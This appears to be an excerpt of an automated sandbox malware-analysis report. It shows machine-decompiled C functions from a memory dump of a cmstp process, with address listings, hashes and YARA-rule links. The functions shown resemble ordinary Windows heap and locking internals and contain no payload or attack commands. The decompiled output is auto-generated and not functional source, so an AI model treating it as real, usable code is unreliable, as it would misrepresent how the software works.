				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x51cd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E050DCC50(_t86);
					L11:
					return E0511B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x51c8504
				E050F2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0511FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0511B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L050F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E050DCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x51c8504
								E050EFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E05104F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x05104bad
0x05104bbf
0x05104bc2
0x05104bc6
0x05104bcd
0x05104bd9
0x051467fe
0x05146800
0x05104ccc
0x05104ccd
0x05104cb7
0x05104cc9
0x05104cc9
0x05104bdf
0x05104be5
0x00000000
0x00000000
0x05104beb
0x05104bef
0x00000000
0x00000000
0x05104bf5
0x05104bf9
0x05104c06
0x05104c0b
0x05104c17
0x05104c1c
0x05104c1f
0x05104c25
0x05104c33
0x05104c3d
0x05104c40
0x05104c43
0x05104c47
0x05104c4d
0x05104c53
0x05104c54
0x05104c55
0x05104c56
0x05104c5b
0x05104c5c
0x05104c63
0x05104c6b
0x00000000
0x00000000
0x05146776
0x05146784
0x05146784
0x0514679f
0x051467a7
0x051467af
0x051467ce
0x00000000
0x051467b1
0x051467b7
0x051467b8
0x051467c1
0x051467d3
0x051467d9
0x051467dd
0x05104c94
0x05104c94
0x05104c98
0x05104c9c
0x05104ca3
0x051467f4
0x051467f4
0x05104cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x05104cb5
0x05104c79
0x05104c7e
0x05104c89
0x05104c8b
0x05104c8f
0x05104c8f
0x00000000
0x05104c89
0x051467c3
0x00000000
0x051467c3
0x051467af
0x05104c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b5afc320fbab4118dde892831476490a39508b59b19b8181466e510bde6a32
Instruction ID: d1ebb862fe30079feb3283f34f9f1741657ec186f9b9eb7f6d2d345e5ed662a5
Opcode Fuzzy Hash: 10b5afc320fbab4118dde892831476490a39508b59b19b8181466e510bde6a32
Instruction Fuzzy Hash: 50418235A002289ACF20EF64C984FEE77B5BF45710F0114A5EA09AB241DBB49E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 050E8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E050E8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x51cd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0511B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E050EE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x50b1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E05101DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E05113C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E050E8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x050e8a0a
0x050e8a1c
0x050e8a23
0x050e8a2e
0x050e8a30
0x050e8a36
0x050e8a3c
0x050e8a3e
0x050e8a4a
0x050e8a52
0x050e8a9c
0x050e8aae
0x050e8a58
0x050e8a5e
0x050e8a6a
0x050e8a6f
0x050e8a75
0x050e8a7d
0x050e8a85
0x050e8a86
0x050e8a89
0x050e8a93
0x050e8a99
0x050e8a9b
0x00000000
0x050e8aaf
0x050e8abe
0x050e8ac3
0x050e8acb
0x050e8ad7
0x050e8ae0
0x050e8af1
0x00000000
0x050e8af1
0x050e8acd
0x050e8ad5
0x050e8afb
0x050e8afd
0x050e8aff
0x050e8b07
0x050e8b22
0x050e8b24
0x050e8b2a
0x050e8b2e
0x050e8b3f
0x050e8b78
0x050e8b41
0x050e8b52
0x050e8b54
0x050e8b5c
0x050e8b74
0x050e8b74
0x050e8b5c
0x050e8b3f
0x050e8b5e
0x050e8b61
0x050e8b64
0x050e8b64
0x050e8b6c
0x050e8b6c
0x050e8b11
0x05139cd5
0x05139cd5
0x050e8b17
0x050e8b1a
0x050e8b1a
0x00000000
0x050e8ad5
0x050e8a89

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d444e999234233bc037ed514d7e0d5739e2b7c997f4085561d1c2912f0f1c73a
Instruction ID: a5dcac0be6993f34c9dfe5fe6ea1df13e1c0db88393d2e38eb6d01d86ad6715f
Opcode Fuzzy Hash: d444e999234233bc037ed514d7e0d5739e2b7c997f4085561d1c2912f0f1c73a
Instruction Fuzzy Hash: A5416EB1A402289FDB64CF15E888ABDB7F9FF84300F2485EAD81997251E7709E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0519AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0519AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0519ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0519AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0519AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0517CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L050F77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E050F7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0519131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0517CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0519aa1f
0x0519aa21
0x0519aa23
0x0519aa2b
0x0519aa30
0x0519aa36
0x0519aa39
0x0519aa42
0x0519aa75
0x0519aa7a
0x0519aa7c
0x0519aa7c
0x0519aa88
0x0519aa8a
0x0519aa8f
0x0519ab02
0x0519ab04
0x0519aa99
0x0519aaa8
0x0519aaaf
0x0519aab3
0x0519aacc
0x0519aad1
0x0519aad6
0x0519aae0
0x0519aaf3
0x0519aaf9
0x0519aafe
0x0519aafe
0x0519aaf3
0x0519aad6
0x0519aab3
0x0519ab07
0x0519ab0a
0x0519ab11
0x0519ab23
0x0519ab13
0x0519ab1c
0x0519ab1c
0x0519ab2b
0x0519ab44
0x0519ab44
0x0519ab51
0x0519ab51
0x0519aa44
0x0519aa47
0x0519aa4c
0x00000000
0x00000000
0x0519aa5a
0x0519aa64
0x0519aa72
0x00000000
0x0519aa66
0x0519aa66
0x0519aa68
0x0519aa6a
0x00000000
0x0519aa6a

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 517125e8bb858c5d484c75e1407670f6ff1602ee7aeaa2e7386a6c3f21991a63
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 0731D332F042146BDF199B69CC85BBFFBBBEF84610F054069E806A7251DB749D48C790

Uniqueness

Uniqueness Score: -1.00%

Function 0519FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0519FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0519FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E051A0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E050F7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05191608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E051A2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0519C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0519DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E050F7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0519A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0519fde7
0x0519fde8
0x0519fdec
0x0519fdee
0x0519fdf5
0x0519fdf7
0x0519fdfc
0x0519fe19
0x0519fe22
0x0519fe26
0x0519fec6
0x0519fecd
0x0519fed5
0x0519fee7
0x0519fed7
0x0519fee0
0x0519fee0
0x0519feef
0x0519ff00
0x0519ff02
0x0519ff07
0x0519ff07
0x00000000
0x0519feef
0x0519fe33
0x0519fe55
0x0519fe59
0x0519fe5b
0x0519fe5e
0x0519fe69
0x0519fe6d
0x0519fe6d
0x0519fe69
0x0519fe35
0x0519fe41
0x0519fe41
0x0519fe79
0x0519fe8b
0x0519fe7b
0x0519fe84
0x0519fe84
0x0519fe93
0x00000000
0x0519fea8
0x0519feba
0x00000000
0x0519feba
0x0519fdfe
0x0519fe01
0x0519fe02
0x0519fe08
0x0519ff0c
0x0519ff14
0x0519ff14

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 641ed23ff5d69beb8ac6f210964ba1f77133e18ca8bba50a60ec87176eb6db45
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 8831D4327046807FDB2BDB68C848F6ABBAAFBC5650F194458E546CB742DB74DC82C760

Uniqueness

Uniqueness Score: -1.00%

Function 0519EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0519EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E050F2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0519E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E050DF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E050EFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0519AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0519BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E050F7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0518FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E050EFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0519A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0519ea55
0x0519ea66
0x0519ea68
0x0519ea6c
0x0519ea6f
0x0519ea72
0x0519ea75
0x0519ea7a
0x0519ea7a
0x0519ea7e
0x0519ea80
0x0519ea85
0x0519ea8b
0x0519eab5
0x0519eabc
0x0519eabf
0x0519eabf
0x0519eaca
0x0519eace
0x0519ead0
0x0519eae4
0x0519eaeb
0x0519eaf0
0x0519eaf5
0x0519eb09
0x0519eb0d
0x0519eb1d
0x0519eb2d
0x0519eb38
0x0519eb3d
0x0519eb41
0x0519eb4a
0x0519eb60
0x0519eb4c
0x0519eb52
0x0519eb59
0x0519eb59
0x0519eb68
0x0519eb71
0x0519eb71
0x0519ea8d
0x0519ea8f
0x0519ea92
0x0519ea97
0x0519ea97
0x0519ea9b
0x0519ea9c
0x0519ea9e
0x0519eaa6
0x0519eaa6
0x0519eb7e

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 6d8da4e3bc7a7ad919cc513c9212dfe582e47c60a84e814f2d694768432ab4ca
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 2B31A172704705ABCB29DF24C884AABB7AAFFC0210F054A2DE55787641DF31E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 051569A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E051569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x51cd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L050E6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05156BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E05119980() >= 0) {
							E050F2280(_t56, 0x51c8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x51c8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x51c8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E050DB6F0(0x50bc338, 0x50bc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E05119520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E051195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E050EFFB0(_t68, _t77, 0x51c8778);
				}
				_pop(_t78);
				return E0511B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x051569b5
0x051569be
0x051569c3
0x051569c9
0x051569cc
0x051569d1
0x051569d3
0x051569de
0x051569e1
0x051569ea
0x051569f6
0x051569fe
0x05156a13
0x05156a14
0x05156a15
0x05156a16
0x05156a1e
0x05156a26
0x05156a31
0x05156a36
0x05156a37
0x05156a40
0x05156a49
0x05156a4a
0x05156a53
0x05156a59
0x05156a5d
0x05156a5e
0x05156a64
0x05156a67
0x05156a6a
0x05156a6d
0x05156a70
0x05156a77
0x05156a7d
0x05156a86
0x05156a89
0x05156a9c
0x05156a9f
0x05156aa2
0x05156aa5
0x05156aaf
0x05156ab1
0x05156ab8
0x05156ab9
0x05156abb
0x05156abe
0x05156ac5
0x05156ac5
0x05156aaf
0x05156a40
0x05156a26
0x051569fe
0x05156ace
0x05156ad0
0x05156ad3
0x05156ad8
0x05156adf
0x05156adf
0x05156ae8
0x05156aef
0x05156aef
0x05156af9
0x05156b06

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615fe8acd2274b4003f1cf3772271c35683f7842ce66d5cbb0f75596ce5b5192
Instruction ID: 8593913160965a1490bf53aafe3c72e6f2a3fb04ba763412e840130619cf49f5
Opcode Fuzzy Hash: 615fe8acd2274b4003f1cf3772271c35683f7842ce66d5cbb0f75596ce5b5192
Instruction Fuzzy Hash: 08415BB1E00208AFEB14DFA5D941BFEBBF4FF48714F14816AE925A7240DB759905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 050D5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E050D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E050D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E051195D0();
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E050EEB70(_t54, 0x51c79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E051195D0();
								L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E050EEB70(_t54, 0x51c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0511F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E050EEB70(_t54, 0x51c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E051195D0();
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x050d5220
0x050d5224
0x05130d13
0x05130d16
0x05130d19
0x050d522a
0x050d522a
0x050d522d
0x050d522d
0x050d5231
0x050d5235
0x050d5239
0x05130d5c
0x05130d62
0x00000000
0x00000000
0x05130d6a
0x05130d7b
0x05130d7f
0x05130d81
0x05130d84
0x05130d95
0x05130d95
0x05130d6c
0x05130d71
0x05130d71
0x05130d9a
0x00000000
0x050d524a
0x050d524a
0x050d5250
0x05130d24
0x05130d35
0x05130d39
0x05130d3b
0x05130d3e
0x05130d50
0x05130d50
0x05130d26
0x05130d2b
0x05130d2b
0x00000000
0x05130d55
0x050d5256
0x050d525b
0x050d5265
0x05130da7
0x050d526b
0x050d526e
0x050d5272
0x05130db1
0x05130db4
0x05130dc5
0x05130dc5
0x050d5272
0x050d5278
0x050d527e
0x050d528a
0x050d528c
0x050d528d
0x00000000
0x050d5280
0x050d5282
0x050d5288
0x050d529f
0x050d5292
0x00000000
0x050d5292
0x00000000
0x050d5288
